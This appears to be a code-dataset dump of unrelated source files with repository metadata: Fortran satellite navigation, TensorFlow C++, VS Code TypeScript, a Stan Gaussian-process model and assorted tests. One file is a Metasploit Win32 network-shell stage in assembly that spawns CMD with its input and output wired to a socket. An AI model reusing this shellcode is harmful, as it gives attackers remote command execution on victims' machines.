IPOWRAD=IPARMS(16) IF (IPOWRAD .EQ. 0) IPOWRAD=3 DRAD=IPARMS(8)/10.D0**IPOWRAD ! REAL Radius of the planet in meters R=DRAD IPOWECC=IPARMS(17) IF (IPOWECC .EQ. 0) IPOWECC=6 DECC=IPARMS(9)/10.D0**IPOWECC ! REAL Eccentricity IWEST=IPARMS(11) ! West positive vs. West negative IF(IWEST.GE.0) IWEST=1 CALL LLOPT(DRAD,DECC,IWEST,IPARMS(10)) ! Initialze LLCART code IF (XCOL.EQ.1) THEN ! special case of XCOL not located at image center ZSLON=ZSLON-180.0*IWEST ! -- so assume it's the left edge(duh) ENDIF ELSE IF (IFUNC.EQ.2) THEN IF(INDEX(CLIT(IPARMS(1)),'XY').NE.0) ITYPE=1 IF(INDEX(CLIT(IPARMS(1)),'LL').NE.0) ITYPE=2 ENDIF NVXINI=0 RETURN 900 CONTINUE NVXINI=-1 RETURN END C *************************************************************************** C * NVXSAE -- Line/Element to Lat/Lon * C *************************************************************************** FUNCTION NVXSAE(XLIN,XELE,XDUM,XLAT,XLON,Z) COMMON/RCTCOM/XROW,XCOL,ZSLAT,ZSLON,ZDLAT,ZDLON,ITYPE,IWEST !,ULLON XLDIF=XROW-XLIN if(xcol.eq.1) then XEDIF=IWEST*(XELE-XCOL) XLON=ZSLON+180*IWEST-XEDIF*ZDLON else XEDIF=IWEST*(XCOL-XELE) XLON=ZSLON+XEDIF*ZDLON endif XLAT=ZSLAT+XLDIF*ZDLAT IF(XLAT.GT.90. .OR. XLAT.LT.-90.) GO TO 900 C -- All we want is to keep the XLON within 180 degrees of the center LON on both sides IF(XLON.GT.(ZSLON+180.0)) GO TO 900 IF(XLON.LT.(ZSLON-180.0)) GO TO 900 IF(XLON.LT.-180.0) THEN XLON=XLON+360.0 ELSE IF (XLON.GT.180) THEN XLON=XLON-360.0 ENDIF IF(ITYPE.EQ.1) THEN YLAT=XLAT YLON=XLON CALL LLCART(YLAT,YLON,XLAT,XLON,Z) ENDIF NVXSAE=0 RETURN 900 CONTINUE NVXSAE=-1 RETURN END C *************************************************************************** C * NVXSAE -- Lat/Lon to Line/Element * C *************************************************************************** FUNCTION NVXEAS(ZLAT,ZLON,Z,XLIN,XELE,XDUM) CHARACTER*12 cfe COMMON/RCTCOM/XROW,XCOL,ZSLAT,ZSLON,ZDLAT,ZDLON,ITYPE,IWEST ! ,ULLON XLAT=ZLAT XLON=ZLON IF(ITYPE.EQ.1) THEN X=XLAT Y=XLON CALL CARTLL(X,Y,Z,XLAT,XLON) ENDIF C -- Keep XLON within 180.0 degrees of ZSLON IF(XLON.GT.(ZSLON+180.0)) THEN XLON=XLON-360.0 ELSEIF(XLON.LT.ZSLON-180.0) THEN XLON=XLON+360.0 ENDIF XLIN=XROW-(XLAT-ZSLAT)/ZDLAT IF (XCOL.EQ.1) THEN C -- Need to adjust for the fact that XCOL is not really at the image center XELE=XCOL-(XLON-ZSLON-180.0*IWEST)/(ZDLON*IWEST) ELSE XELE=XCOL-(XLON-ZSLON)/(ZDLON*IWEST) ENDIF NVXEAS=0 RETURN END FUNCTION NVXOPT(IFUNC,XIN,XOUT) COMMON/RCTCOM/XROW,XCOL,ZSLAT,ZSLON,ZDLAT,ZDLON,ITYPE,IWEST REAL*4 XIN(*),XOUT(*) CHARACTER*4 CLIT,CFUNC C C IFUNC= 'SPOS' SUBSATELLITE LAT/LON C C XIN - NOT USED C XOUT - 1. STANDARD LATITUDE C - 2. NORMAL LONGITUDE C C C IFUNC= 'ORAD' OBLATE RADIUS C C XIN - LATITUDE C XOUT - RADIUS IN KM C CFUNC=CLIT(IFUNC) NVXOPT=0 IF(CFUNC.EQ.'SPOS') THEN XOUT(1)=ZSLAT XOUT(2)=ZSLON C ELSE IF(CFUNC.EQ.'ORAD') THEN CALL LLOBL(XIN,XOUT) ELSE NVXOPT=1 ENDIF RETURN END
IDL
5
oxelson/gempak
extlibs/AODT/v72/odtmcidas/navcal/navcal/nvxrect.dlm
[ "BSD-3-Clause" ]
// RUN: %sourcekitd-test -req=cursor -pos=5:16 %s -- %s | %FileCheck %s protocol View {} struct MyView: View {} func indicator<T>(_ a: T) -> some View { MyView() } // CHECK: source.lang.swift.decl.generic_type_param
Swift
4
gandhi56/swift
test/SourceKit/CursorInfo/rdar_64230277.swift
[ "Apache-2.0" ]
/* Copyright 2017 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #include <memory> #include <string> #include <unordered_map> #include <vector> #include "absl/strings/str_cat.h" #include "tensorflow/lite/toco/graph_transformations/graph_transformations.h" #include "tensorflow/lite/toco/model.h" #include "tensorflow/lite/toco/tooling_util.h" #include "tensorflow/core/platform/logging.h" namespace toco { bool ProcessConvOperator(Model* model, ConvOperator* op) { if (op->outputs.size() == 2) { // We already have an im2col array return false; } const auto& weights_array = model->GetArray(op->inputs[1]); if (!weights_array.has_shape()) { // We need to yield until weights dims have been resolved, because // from the weights dims we determine whether an im2col array is // needed. return false; } const auto& weights_shape = weights_array.shape(); const int kheight = weights_shape.dims(1); const int kwidth = weights_shape.dims(2); if (kwidth == 1 && kheight == 1 && op->stride_width == 1 && op->stride_height == 1 && op->dilation_width_factor == 1 && op->dilation_height_factor == 1) { // 1x1 unstrided undilated conv does not need an im2col array. return false; } // Create the im2col array. CHECK_EQ(op->outputs.size(), 1); const std::string& im2col_array_name = AvailableArrayName(*model, op->inputs[0] + "_im2col"); model->GetOrCreateArray(im2col_array_name); op->outputs.push_back(im2col_array_name); return true; } bool ProcessTransposeConvOperator(Model* model, TransposeConvOperator* op) { if (op->outputs.size() == 2) { // We already have an im2col array return false; } // Always create an im2col array for transpose_conv. CHECK_EQ(op->outputs.size(), 1); const std::string& im2col_array_name = AvailableArrayName( *model, op->inputs[TransposeConvOperator::DATA_INPUT] + "_im2col"); model->GetOrCreateArray(im2col_array_name); op->outputs.push_back(im2col_array_name); return true; } ::tensorflow::Status CreateIm2colArrays::Run(Model* model, std::size_t op_index, bool* modified) { *modified = false; auto it = model->operators.begin() + op_index; auto* op = it->get(); switch (op->type) { case OperatorType::kConv: *modified = ProcessConvOperator(model, static_cast<ConvOperator*>(op)); return ::tensorflow::Status::OK(); case OperatorType::kTransposeConv: *modified = ProcessTransposeConvOperator( model, static_cast<TransposeConvOperator*>(op)); return ::tensorflow::Status::OK(); default: return ::tensorflow::Status::OK(); } } } // namespace toco
C++
4
yage99/tensorflow
tensorflow/lite/toco/graph_transformations/create_im2col_arrays.cc
[ "Apache-2.0" ]
/*--------------------------------------------------------------------------------------------- * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for license information. *--------------------------------------------------------------------------------------------*/ import { WebContents } from 'electron'; import { Event } from 'vs/base/common/event'; import { IProcessEnvironment } from 'vs/base/common/platform'; import { URI } from 'vs/base/common/uri'; import { NativeParsedArgs } from 'vs/platform/environment/common/argv'; import { createDecorator } from 'vs/platform/instantiation/common/instantiation'; import { ICodeWindow } from 'vs/platform/window/electron-main/window'; import { IOpenEmptyWindowOptions, IWindowOpenable } from 'vs/platform/window/common/window'; export const IWindowsMainService = createDecorator<IWindowsMainService>('windowsMainService'); export interface IWindowsMainService { readonly _serviceBrand: undefined; readonly onDidChangeWindowsCount: Event<IWindowsCountChangedEvent>; readonly onDidOpenWindow: Event<ICodeWindow>; readonly onDidSignalReadyWindow: Event<ICodeWindow>; readonly onDidDestroyWindow: Event<ICodeWindow>; open(openConfig: IOpenConfiguration): ICodeWindow[]; openEmptyWindow(openConfig: IOpenEmptyConfiguration, options?: IOpenEmptyWindowOptions): ICodeWindow[]; openExistingWindow(window: ICodeWindow, openConfig: IOpenConfiguration): void; openExtensionDevelopmentHostWindow(extensionDevelopmentPath: string[], openConfig: IOpenConfiguration): ICodeWindow[]; sendToFocused(channel: string, ...args: any[]): void; sendToAll(channel: string, payload?: any, windowIdsToIgnore?: number[]): void; getWindows(): ICodeWindow[]; getWindowCount(): number; getFocusedWindow(): ICodeWindow | undefined; getLastActiveWindow(): ICodeWindow | undefined; getWindowById(windowId: number): ICodeWindow | undefined; getWindowByWebContents(webContents: WebContents): ICodeWindow | undefined; } export interface IWindowsCountChangedEvent { readonly oldCount: number; readonly newCount: number; } export const enum OpenContext { // opening when running from the command line CLI, // macOS only: opening from the dock (also when opening files to a running instance from desktop) DOCK, // opening from the main application window MENU, // opening from a file or folder dialog DIALOG, // opening from the OS's UI DESKTOP, // opening through the API API } export interface IBaseOpenConfiguration { readonly context: OpenContext; readonly contextWindowId?: number; } export interface IOpenConfiguration extends IBaseOpenConfiguration { readonly cli: NativeParsedArgs; readonly userEnv?: IProcessEnvironment; readonly urisToOpen?: IWindowOpenable[]; readonly waitMarkerFileURI?: URI; readonly preferNewWindow?: boolean; readonly forceNewWindow?: boolean; readonly forceNewTabbedWindow?: boolean; readonly forceReuseWindow?: boolean; readonly forceEmpty?: boolean; readonly diffMode?: boolean; addMode?: boolean; readonly gotoLineMode?: boolean; readonly initialStartup?: boolean; readonly noRecentEntry?: boolean; /** * The remote authority to use when windows are opened with either * - no workspace (empty window) * - a workspace that is neither `file://` nor `vscode-remote://` */ readonly remoteAuthority?: string; } export interface IOpenEmptyConfiguration extends IBaseOpenConfiguration { }
TypeScript
5
sbj42/vscode
src/vs/platform/windows/electron-main/windows.ts
[ "MIT" ]
package gw.specContrib.enhancements.enhWithTypeParams enhancement Errant_EnhSet1<Integer>: Set<Integer> { }
Gosu
2
dmcreyno/gosu-lang
gosu-test/src/test/gosu/gw/specContrib/enhancements/enhWithTypeParams/Errant_EnhSet1.gsx
[ "Apache-2.0" ]
(* ****** ****** *) #include "share/atspre_staload.hats" #include "share/atspre_staload_libats_ML.hats" (* ****** ****** *) abstype item abstype itemopt(bool) (* ****** ****** *) extern fun{} itemopt_is_some (x0: itemopt(b)): [b==true] void extern fun{} itemopt_is_none (x0: itemopt(b)): [b==false] void (* ****** ****** *) extern fun{} itemopt_unsome(itemopt(true)): item extern fun{} itemopt_unnone(itemopt(false)): item (* ****** ****** *) extern fun{} counting$get(): item (* ****** ****** *) (* end of [CountingByHash.dats] *)
ATS
3
ats-lang/ATS-CodeBook
RECIPE/CountingByHash/CountingByHash.dats
[ "MIT" ]
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #ifndef TENSORFLOW_CORE_KERNELS_COLLECTIVE_NCCL_GATHERER_H_ #define TENSORFLOW_CORE_KERNELS_COLLECTIVE_NCCL_GATHERER_H_ #include "tensorflow/core/kernels/collective_nccl.h" namespace tensorflow { #if GOOGLE_CUDA || TENSORFLOW_USE_ROCM class NcclGatherer : public NcclBase { public: NcclGatherer() : NcclBase(GATHER_COLLECTIVE, "NcclGather") {} ~NcclGatherer() override = default; // Hands off all-gather to NcclManager. void Run(StatusCallback done) override; }; #endif // GOOGLE_CUDA || TENSORFLOW_USE_ROCM } // namespace tensorflow #endif // TENSORFLOW_CORE_KERNELS_COLLECTIVE_NCCL_GATHERER_H_
C
4
abhaikollara/tensorflow
tensorflow/core/kernels/collective_nccl_gatherer.h
[ "Apache-2.0" ]
functions { vector gp_pred_rng(vector x2, vector f1, vector x1, real alpha, real lscale, real jitter2) { // rng for predictive distribution of latent values at test locations int N1 = rows(x1); int N2 = rows(x2); vector[N2] f2; { matrix[N1, N1] K = cov_exp_quad(to_array_1d(x1), alpha, lscale) + diag_matrix(rep_vector(jitter2, N1)); matrix[N1, N1] L_K = cholesky_decompose(K); vector[N1] L_K_div_f1 = mdivide_left_tri_low(L_K, f1); vector[N1] K_div_f1 = mdivide_right_tri_low(L_K_div_f1', L_K)'; matrix[N1, N2] k_x1_x2 = cov_exp_quad(to_array_1d(x1), to_array_1d(x2), alpha, lscale); vector[N2] f2_mu = (k_x1_x2' * K_div_f1); matrix[N1, N2] v_pred = mdivide_left_tri_low(L_K, k_x1_x2); matrix[N2, N2] cov_f2 = cov_exp_quad(to_array_1d(x2), alpha, lscale) - v_pred' * v_pred + diag_matrix(rep_vector(jitter2, N2)); f2 = multi_normal_rng(f2_mu, cov_f2); } return f2; } } data { int<lower=1> N; vector[N] x; int<lower=0> y[N]; real<lower=0> Ey; // expected count int<lower=1> N_predict; vector[N_predict] x_predict; real<lower=0> alpha0; // lscale prior parameter real<lower=0> beta0; // lscale prior parameter } transformed data { real jitter2 = 1e-6; // jitter to stabilize covariance matrices vector[N] xc; // centered version of x vector[N_predict] xcp; // centered version of x_predict real xmean; xmean = mean(x); xc = x-xmean; xcp = x_predict-xmean; } parameters { real<lower=0> lscale; real<lower=0> alpha; real a; real b; vector[N] z; } model { vector[N] f; matrix[N, N] cov = cov_exp_quad(to_array_1d(xc), alpha, lscale) + diag_matrix(rep_vector(jitter2, N)); matrix[N, N] L_cov = cholesky_decompose(cov); // non-centered parameterization z ~ normal(0,1); f = L_cov*z; // priors lscale ~ inv_gamma(alpha0, beta0); alpha ~ normal(0, .5); a ~ normal(0, .1); b ~ normal(0, .1); // observation model y ~ poisson_log(log(Ey) + a + xc*b + f); } generated quantities { vector[N_predict] mu_predict; vector[N_predict] y_predict; vector[N] log_lik; { vector[N] f; vector[N_predict] f_predict; matrix[N, N] cov = cov_exp_quad(to_array_1d(xc), alpha, lscale) + diag_matrix(rep_vector(jitter2, N)); matrix[N, N] L_cov = cholesky_decompose(cov); f = L_cov*z; f_predict = gp_pred_rng(xcp, f, xc, alpha, lscale, jitter2); for (n in 1:N_predict) mu_predict[n] = exp(log(Ey) + a + xcp[n]*b + f_predict[n]); for (n in 1:N_predict) y_predict[n] = poisson_log_rng(log(Ey) + a + xcp[n]*b + f_predict[n]); for (n in 1:N) log_lik[n] = poisson_log_lpmf(y[n] | log(Ey) + a + xc[n]*b + f[n]); } }
Stan
5
tonyctan/BDA_R_demos
demos_rstan/poisson_gp.stan
[ "BSD-3-Clause" ]
$$ MODE TUSCRIPT file="lines.txt" ERROR/STOP OPEN (file,READ,-std-) line2fetch=7
Turing
2
LaudateCorpus1/RosettaCodeData
Task/Read-a-specific-line-from-a-file/TUSCRIPT/read-a-specific-line-from-a-file.tu
[ "Info-ZIP" ]
.class public synchronized kilim/test/ex/ExYieldSub .super kilim/test/ex/ExYieldBase ; ------------------------------------------------------------- .method public <init>()V ; ------------------------------------------------------------- aload 0 invokespecial kilim/test/ex/ExYieldBase/<init>()V return .limit stack 1 .limit locals 1 .end method ; ------------------------------------------------------------- .method public execute()V ; ------------------------------------------------------------- .throws kilim/Pausable aload 0 iconst_0 putfield kilim/test/ex/ExYieldSub/doPause Z aload 0 invokespecial kilim/test/ex/ExYieldSub/test()V aload 0 iconst_1 putfield kilim/test/ex/ExYieldSub/doPause Z aload 0 invokespecial kilim/test/ex/ExYieldSub/test()V return .limit stack 2 .limit locals 1 .end method ; ------------------------------------------------------------- .method private test()V ; ------------------------------------------------------------- .throws kilim/Pausable aload 0 getfield kilim/test/ex/ExYieldSub/testCase I tableswitch 0 L0 L1 L2 L3 default: L0 L0: getstatic kilim/test/ex/ExYieldSub/fd D getstatic kilim/test/ex/ExYieldSub/ff F aload 0 getfield kilim/test/ex/ExYieldSub/doPause Z invokestatic kilim/test/ex/ExYieldSub/nonPausableJSRs(DFZ)V goto L4 L1: getstatic kilim/test/ex/ExYieldSub/fd D getstatic kilim/test/ex/ExYieldSub/ff F aload 0 getfield kilim/test/ex/ExYieldSub/doPause Z invokestatic kilim/test/ex/ExYieldSub/singlePausable(DFZ)V goto L4 L2: getstatic kilim/test/ex/ExYieldSub/fc C getstatic kilim/test/ex/ExYieldSub/fl J aload 0 getfield kilim/test/ex/ExYieldSub/doPause Z invokestatic kilim/test/ex/ExYieldSub/multiplePausable(CJZ)V goto L4 L3: getstatic kilim/test/ex/ExYieldBase/fd D getstatic kilim/test/ex/ExYieldBase/fs Ljava/lang/String; getstatic kilim/test/ex/ExYieldBase/fl J aload 0 getfield kilim/test/ex/ExYieldSub/doPause Z invokestatic kilim/test/ex/ExYieldSub/mixedPausable(DLjava/lang/Object;JZ)V L4: return .limit stack 10 .limit locals 1 .end method ; ------------------------------------------------------------- .method public static nonPausableJSRs(DFZ)V ; nonPausableJSRs(double d, float f, boolean doPause) ; ------------------------------------------------------------- ; load stack before jsr. This gets consumed by SUB2 when SUB 1 calls it. dload 0 fload 2 jsr L1 return L1: astore 4 dload 0 invokestatic kilim/test/ex/ExYieldBase/verify(D)V fload 2 invokestatic kilim/test/ex/ExYieldBase/verify(F)V jsr L2 ret 4 L2: astore 5 invokestatic kilim/test/ex/ExYieldBase/verify(F)V invokestatic kilim/test/ex/ExYieldBase/verify(D)V ret 5 .limit stack 10 .limit locals 6 .end method ; ------------------------------------------------------------- .method public static singlePausable(DFZ)V ; single(double d, float f, boolean doPause) ; ------------------------------------------------------------- .throws kilim/Pausable ; load stack before JSR dload 0 fload 2 jsr L ; make sure local vars haven't been tampered with dload 0 invokestatic kilim/test/ex/ExYieldBase/verify(D)V fload 2 invokestatic kilim/test/ex/ExYieldBase/verify(F)V return L: astore 4 ; ret address iload 3 ifeq L1 ; if doPause ldc2_w 10 invokestatic kilim/Task/sleep(J)V ; Task.sleep(10) L1: ; verify stack is preserved invokestatic kilim/test/ex/ExYieldBase/verify(F)V invokestatic kilim/test/ex/ExYieldBase/verify(D)V ; verify local vars are preserved dload 0 invokestatic kilim/test/ex/ExYieldBase/verify(D)V fload 2 invokestatic kilim/test/ex/ExYieldBase/verify(F)V ret 4 .limit stack 10 .limit locals 5 .end method ; ------------------------------------------------------------- .method public static multiplePausable(CJZ)V ; ------------------------------------------------------------- .throws kilim/Pausable ; load stack before JSR iload 0 lload 1 jsr SUB1 lload 1 iload 0 jsr SUB2 iload 0 lload 1 jsr SUB1 ; make sure local vars haven't been tampered with iload 0 invokestatic kilim/test/ex/ExYieldBase/verify(I)V lload 1 invokestatic kilim/test/ex/ExYieldBase/verify(J)V return ; SUB1 consumes long then int on stack, and leaves it empty SUB1: astore 4 ; ret address iload 3 ifeq L1 ; if doPause ldc2_w 10 invokestatic kilim/Task/sleep(J)V ; Task.sleep(10) L1: ; verify stack is preserved invokestatic kilim/test/ex/ExYieldBase/verify(J)V invokestatic kilim/test/ex/ExYieldBase/verify(I)V ; verify local vars are preserved iload 0 invokestatic kilim/test/ex/ExYieldBase/verify(I)V lload 1 invokestatic kilim/test/ex/ExYieldBase/verify(J)V ret 4 ; SUB2 consumes int then long on stack, and leaves it empty SUB2: astore 4 ; ret address iload 3 ifeq L2 ; if doPause ldc2_w 10 invokestatic kilim/Task/sleep(J)V ; Task.sleep(10) L2: ; verify stack is preserved invokestatic kilim/test/ex/ExYieldBase/verify(I)V invokestatic kilim/test/ex/ExYieldBase/verify(J)V ; verify local vars are preserved iload 0 invokestatic kilim/test/ex/ExYieldBase/verify(I)V lload 1 invokestatic kilim/test/ex/ExYieldBase/verify(J)V ret 4 .limit stack 10 .limit locals 5 .end method ; ------------------------------------------------------------- .method public static mixedPausable(DLjava/lang/Object;JZ)V ; ------------------------------------------------------------- .throws kilim/Pausable ; throw in some constants in the stack sipush 10 bipush 10 ldc 10.0 ldc2_w 10.0 ldc2_w 10 ldc "10" ; some duplicates dup dload 0 ; stack has S B F D J Str Str D ; The subroutines below don't touch the stack, so we'll verify ; if they have been preserved at the end. jsr NonPausableSub jsr PausableSub jsr NonPausableSub jsr PausableSub ; make sure local vars haven't been tampered with dload 0 invokestatic kilim/test/ex/ExYieldBase/verify(D)V aload 2 checkcast java/lang/String invokestatic kilim/test/ex/ExYieldBase/verify(Ljava/lang/String;)V ; make sure all stack vars are preserved. invokestatic kilim/test/ex/ExYieldBase/verify(D)V invokestatic kilim/test/ex/ExYieldBase/verify(Ljava/lang/String;)V invokestatic kilim/test/ex/ExYieldBase/verify(Ljava/lang/String;)V invokestatic kilim/test/ex/ExYieldBase/verify(J)V invokestatic kilim/test/ex/ExYieldBase/verify(D)V invokestatic kilim/test/ex/ExYieldBase/verify(F)V invokestatic kilim/test/ex/ExYieldBase/verify(I)V invokestatic kilim/test/ex/ExYieldBase/verify(S)V return NonPausableSub: ; just to test that if the entry and exit are in the same BB ; it is ok. astore 6 ret 6 PausableSub: astore 6 ; ret address iload 5 ifeq NOSLEEP ; if doPause ldc2_w 10 invokestatic kilim/Task/sleep(J)V ; Task.sleep(10) NOSLEEP: ; verify sample local vars are preserved lload 3 invokestatic kilim/test/ex/ExYieldBase/verify(J)V dload 0 invokestatic kilim/test/ex/ExYieldBase/verify(D)V ret 6 .limit stack 20 .limit locals 7 .end method
Jasmin
4
little-pan/kilim
test/kilim/test/ex/ExYieldSub.j
[ "MIT" ]
; Title: Win32 Network Shell ; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 ; Author: hdm[at]metasploit.com [BITS 32] ; [ebp + 0] = kernel32.dll base ; [ebp + 4] = LGetProcAddress ; [ebp + 8] = LoadLibraryA ; edi = socket LSetCommand: push "CMD" mov ebx, esp LCreateProcessStructs: xchg edi, edx ; save edi to edx xor eax,eax ; overwrite with null lea edi, [esp-84] ; struct sizes push byte 21 ; 21 * 4 = 84 pop ecx ; set counter LBZero: rep stosd ; overwrite with null xchg edi, edx ; restore edi LCreateStructs: sub esp, 84 mov byte [esp + 16], 68 ; si.cb = sizeof(si) mov word [esp + 60], 0x0101 ; si.dwflags ; socket handles mov [esp + 16 + 56], edi mov [esp + 16 + 60], edi mov [esp + 16 + 64], edi lea eax, [esp + 16] ; si push esp ; pi push eax push ecx push ecx push ecx inc ecx push ecx dec ecx push ecx push ecx push ebx push ecx LCreateProcessA: push dword [ebp] ; kernel32.dll push 0x16b3fe72 ; CreateProcessA call [ebp + 4] call eax mov esi, esp LWaitForSingleObject: push dword [ebp] ; kernel32.dll push 0xce05d9ad ; WaitForSingleObject call [ebp + 4] mov ebx, eax push 0xFFFFFFFF push dword [esi] call ebx LDeathBecomesYou: push dword [ebp] ; kernel32.dll push 0x73e2d87e ; ExitProcess call [ebp + 4] xor ebx, ebx push ebx call eax
Assembly
2
OsmanDere/metasploit-framework
external/source/shellcode/windows/msf2/win32_stage_shell.asm
[ "BSD-2-Clause", "BSD-3-Clause" ]
.test { @color: red; color: @color; }
CSS
2
fuelingtheweb/prettier
tests/css_atword/atword.css
[ "MIT" ]